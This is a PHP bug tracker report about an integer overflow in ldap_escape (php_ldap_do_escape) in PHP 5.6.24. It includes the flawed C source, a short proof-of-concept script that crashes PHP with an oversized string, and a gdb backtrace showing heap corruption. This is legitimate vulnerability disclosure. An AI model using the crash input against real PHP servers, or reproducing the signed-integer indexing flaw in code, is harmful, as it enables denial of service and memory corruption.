|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2016-09-02 06:23 UTC] stas@php.net
-Assigned To:
+Assigned To: stas
[2016-09-02 06:23 UTC] stas@php.net
[2016-09-05 05:29 UTC] minhrau dot vc dot 365 at gmail dot com
[2016-09-13 04:13 UTC] stas@php.net
-Status: Assigned
+Status: Closed
[2016-09-13 04:13 UTC] stas@php.net
[2017-02-13 01:32 UTC] stas@php.net
-Type: Security
+Type: Bug
|
|||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Sat Dec 21 17:01:58 2024 UTC |
Description: ------------ static void php_ldap_do_escape(const zend_bool *map, const char *value, size_t valuelen, char **result, size_t *resultlen) { char hex[] = "0123456789abcdef"; int i, p = 0; size_t len = 0; for (i = 0; i < valuelen; i++) { len += (map[(unsigned char) value[i]]) ? 3 : 1; } (*result) = (char *) safe_emalloc(1, len, 1); (*resultlen) = len; for (i = 0; i < valuelen; i++) { unsigned char v = (unsigned char) value[i]; if (map[v]) { (*result)[p++] = '\\'; (*result)[p++] = hex[v >> 4]; //p = -2147483647 will lead to head corruption (*result)[p++] = hex[v & 0x0f]; } else { (*result)[p++] = v; } } (*result)[p++] = '\0'; } Test script: --------------- <?php ini_set('memory_limit', -1); $str = str_repeat('a', 0xffffffff/6+7); var_dump(strlen($str)); $str1 = ldap_escape($str); //crash ?> Expected result: ---------------- No crash Actual result: -------------- Starting program: /home/minhrau/PHP-5.6.24/sapi/cli/php testldap_escape_negative.php [Thread debugging using libthread_db enabled] Using host libthread_db library "/usr/lib/libthread_db.so.1". int(715827889) Program received signal SIGSEGV, Segmentation fault. 0x00000000006b5fcf in php_ldap_do_escape (map=0x7fffffffa720 '\001' <repeats 200 times>..., value=0x7fffc54bc030 'a' <repeats 200 times>..., valuelen=715827889, result=0x7fffffffa840, resultlen=0x7fffffffa830) at /home/minhrau/PHP-5.6.24/ext/ldap/ldap.c:2658 2658 (*result)[p++] = hex[v & 0x0f]; (gdb) bt #0 0x00000000006b5fcf in php_ldap_do_escape (map=0x7fffffffa720 '\001' <repeats 200 times>..., value=0x7fffc54bc030 'a' <repeats 200 times>..., valuelen=715827889, result=0x7fffffffa840, resultlen=0x7fffffffa830) at /home/minhrau/PHP-5.6.24/ext/ldap/ldap.c:2658 #1 0x00000000006b6241 in zif_ldap_escape (ht=1, return_value=0x7ffff7f9ef68, return_value_ptr=0x7ffff7f6b140, this_ptr=0x0, return_value_used=1) at /home/minhrau/PHP-5.6.24/ext/ldap/ldap.c:2711 #2 0x00000000009652bf in zend_do_fcall_common_helper_SPEC (execute_data=0x7ffff7f6b238) at /home/minhrau/PHP-5.6.24/Zend/zend_vm_execute.h:558 #3 0x000000000096ceef in ZEND_DO_FCALL_SPEC_CONST_HANDLER (execute_data=0x7ffff7f6b238) at /home/minhrau/PHP-5.6.24/Zend/zend_vm_execute.h:2602 #4 0x00000000009637b2 in execute_ex (execute_data=0x7ffff7f6b238) at /home/minhrau/PHP-5.6.24/Zend/zend_vm_execute.h:363 #5 0x000000000096419e in zend_execute (op_array=0x7ffff7f9f838) at /home/minhrau/PHP-5.6.24/Zend/zend_vm_execute.h:388 #6 0x000000000091f70e in zend_execute_scripts (type=8, retval=0x0, file_count=3) at /home/minhrau/PHP-5.6.24/Zend/zend.c:1341 #7 0x0000000000890619 in php_execute_script (primary_file=0x7fffffffe2a0) at /home/minhrau/PHP-5.6.24/main/main.c:2613 #8 0x0000000000a42420 in do_cli (argc=2, argv=0x11f8960) at /home/minhrau/PHP-5.6.24/sapi/cli/php_cli.c:994 #9 0x0000000000a4346e in main (argc=2, argv=0x11f8960) at /home/minhrau/PHP-5.6.24/sapi/cli/php_cli.c:1378 (gdb) p p $8 = -2147483647